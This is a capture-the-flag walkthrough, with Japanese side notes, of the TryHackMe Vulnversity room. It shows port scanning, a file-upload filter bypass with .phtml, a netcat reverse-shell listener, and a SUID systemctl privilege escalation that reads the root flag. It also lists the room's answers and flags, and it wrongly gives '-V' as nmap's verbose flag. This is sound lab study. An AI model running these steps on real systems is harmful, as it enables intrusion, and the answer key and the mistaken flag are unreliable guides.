[TryHackMe] Vulnversity-writeup

Task2

Reconnaissance

Scan the box; how many ports are open?

┌──(notthei㉿kali)-[~]
└─$ nmap -sV  10.10.14.51 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 09:22 JST
Nmap scan report for 10.10.14.51
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.5
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
3128/tcp open  http-proxy  Squid http proxy 4.10
3333/tcp open  http        Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.73 seconds

6

What version of the squid proxy is running on the machine?

4.10

How many ports will Nmap scan if the flag -p-400 was used?

400

What is the most likely operating system this machine is running?

Ubuntu

What port is the web server running on?

3333

What is the flag for enabling verbose mode using Nmap?

-V

Task3

Locating directories using Gobuster

What is the directory that has an upload form page?

internal

Task4

Compromise the Webserver

What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

.php

What extension is allowed after running the above exercise?

なんかたまたま適当にファイル投下してたらできた()

.phtml

What is the name of the user who manages the webserver?

これを使用してshellを反射させる

/internal/uploads/にアップロードしたファイルがあります。

┌──(notthei㉿kali)-[~]
└─$ nc -lvnp 9999
$
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ip-10-10-14-51:/$ cat /etc/passwd

www-data@ip-10-10-14-51:/home$ ls
bill  ubuntu

bill

What is the user flag?

/home/bill/user.txt

8bd7992fbe8a6ad22a63361004cfcedb

Task5

Privilege Escalation

On the system, search for all SUID files. Which file stands out?

www-data@ip-10-10-14-51:/home/bill$ find / -perm -u+s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/bin/su
/bin/mount
/bin/umount
/bin/systemctl
/bin/fusermount

systemctlが怪しい

bin/systemctl

What is the root flag value?

systemctlにSUIDが立っているので権限昇格ができます

www-data@ip-10-10-14-51:/home/bill$TF=$(mktemp).service
> echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@ip-10-10-14-51:/home/bill$ systemctl link $TF
www-data@ip-10-10-14-51:/home/bill$ systemctl enable --now $TF

www-data@ip-10-10-14-51:/home/bill$ cat /tmp/root

a58ff8579f0a9270368d33a9966c7fd5